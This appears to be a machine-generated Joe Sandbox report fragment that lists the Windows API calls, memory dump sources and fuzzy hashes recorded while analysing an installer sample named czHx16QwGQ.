                                                                                                                APIs
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue
                                                                                                                • String ID: Call
                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 334405425-0
                                                                                                                • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                                • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                                APIs
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$CloseValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 397863658-0
                                                                                                                • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                                • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                                • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                                                                                                  • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,?), ref: 0040164D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 1892508949-0
                                                                                                                • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                                • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                                APIs
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3356406503-0
                                                                                                                • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                                • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                APIs
                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2831762973-0
                                                                                                                • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                                • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                                • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1136574915-0
                                                                                                                • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
